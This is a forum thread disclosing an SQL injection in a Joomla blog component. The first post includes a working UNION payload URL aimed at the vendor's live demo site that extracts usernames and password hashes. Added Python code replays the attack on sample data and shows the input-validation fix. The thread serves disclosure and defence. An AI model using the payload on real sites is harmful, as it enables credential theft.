Fresher 2 posts since
Nov 29, 2009

2009-11-29 18:34:02

Joomla LyftenBloggie Component "author" SQL Injection Vulnerability

I've been searching the demo site and found that LyftenBloggie is vulnerable to an "author" SQL injection, as posted on the Secunia website: http://secunia.com/advisories/37499/. This allows hackers to steal your users' names and passwords using LyftenBloggie.

Copy and paste the following code in your browser for a demo:

http://demo.lyften.com/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users--

LyftenBloggie is a great and promising component, and I hope lyften.com can fix it soon.

The complete details of the vulnerability can be found at http://www.packetstormsecurity.org/0911-exploits/lyften-sql.txt

Last edited on 2009-11-29 18:34:02 by teng. Reason: Added demo code
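As an added illustration (this is not LyftenBloggie's own code, nor the fix linked later in the thread), the script below first decodes the demo URL posted above to show the SQL fragment the component receives in its "author" parameter, then replays the same UNION technique against an in-memory SQLite database with constructed sample rows, next to a hardened version of the query. The blog_entries table, the three-column query, the hypothetical vulnerable function and the sample rows are assumptions made for this example; the MySQL-only parts of the posted payload (concat_ws, @@version, the 30-column UNION) are swapped for SQLite equivalents so it runs offline. The mechanism is unchanged: a numeric parameter concatenated into SQL lets an attacker append a second SELECT whose rows (username:hash from jos_users) come back in the page's result set.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The demo URL from the post above. Decoding the query string shows the SQL
# fragment the component receives as its "author" parameter ('+' decodes to a space).
POSTED_URL = (
    "http://demo.lyften.com/index.php?option=com_lyftenbloggie&author=62"
    "+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,"
    "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users--"
)

# SQLite stand-in for that payload (constructed for this example): three columns
# to match the hypothetical query below, '||' in place of MySQL's concat_ws(),
# sqlite_version() in place of @@version. Each user becomes one extra result row.
SQLITE_PAYLOAD = (
    "62 union select 1, username || ':' || password, sqlite_version() from jos_users--"
)


def decode_author_param(url):
    """Return the raw value a server would see for the 'author' query parameter."""
    return parse_qs(urlsplit(url).query)["author"][0]


def setup_db():
    """In-memory database with constructed sample rows standing in for jos_users."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        CREATE TABLE blog_entries (id INTEGER, title TEXT, author INTEGER);
        INSERT INTO jos_users VALUES (62, 'admin',  '5f4dcc3b5aa765d61d8327deb882cf99:9Ys2');
        INSERT INTO jos_users VALUES (63, 'editor', 'e10adc3949ba59abbe56e057f20f883e:kT1q');
        INSERT INTO blog_entries VALUES (1, 'First entry',  62);
        INSERT INTO blog_entries VALUES (2, 'Second entry', 63);
        """
    )
    return con


def vulnerable_entries_by_author(con, author):
    """Hypothetical vulnerable pattern: the request value is pasted straight into SQL."""
    sql = "SELECT id, title, author FROM blog_entries WHERE author=" + author
    return con.execute(sql).fetchall()


def safe_author_id(author):
    """Accept only an unsigned integer id; anything else (including the payload) is rejected."""
    return int(author) if re.fullmatch(r"[0-9]+", author) else None


def hardened_entries_by_author(con, author):
    """Fixed form: validate the type, then bind the value instead of concatenating."""
    author_id = safe_author_id(author)
    if author_id is None:
        return []  # a real component would answer with an error page instead
    sql = "SELECT id, title, author FROM blog_entries WHERE author=?"
    return con.execute(sql, (author_id,)).fetchall()


def leaked_credentials(rows):
    """Pull the 'username:hash' strings the UNION smuggled into the title column."""
    return [title for (_id, title, _author) in rows if ":" in title]


if __name__ == "__main__":
    print("author param decodes to:", decode_author_param(POSTED_URL))
    db = setup_db()
    rows = vulnerable_entries_by_author(db, SQLITE_PAYLOAD)
    print("vulnerable query leaks:", leaked_credentials(rows))
    print("hardened query with payload:", hardened_entries_by_author(db, SQLITE_PAYLOAD))
    print("hardened query with '62':", hardened_entries_by_author(db, "62"))
```

Two things the script makes visible that the URL alone does not: the attacker has to match the column count of the original SELECT exactly (hence the long run of 1s in the posted payload, which is how the 30-column figure was found), and a fix that casts or validates the parameter as an integer before it reaches the query kills the whole class, not just this payload. Binding the value is the belt-and-braces second step.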
Fresher 3 posts since
Oct 27, 2009

2009-11-29 23:57:44

Re: Joomla LyftenBloggie Component "author" SQL Injection Vulnerability

I think I got hacked this way.

Thankfully, web developer Jeff Channell has posted a fix until a patch becomes available:

http://jeffchannell.com/Joomla/lyften-bloggie-sql-injection-fix.html

Fresher
dpk
1 post since
Nov 14, 2009

2009-12-01 09:59:02

Re: Joomla LyftenBloggie Component "author" SQL Injection Vulnerability

Details on the exploit are here: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4104

You can use the NIST feed for Joomla and pump it into your admin backend, feed reader client, or a FeedBurner mailing list.

Is LyftenBloggie in active development? If there is no response to this exploit from the dev, that's a bad sign.
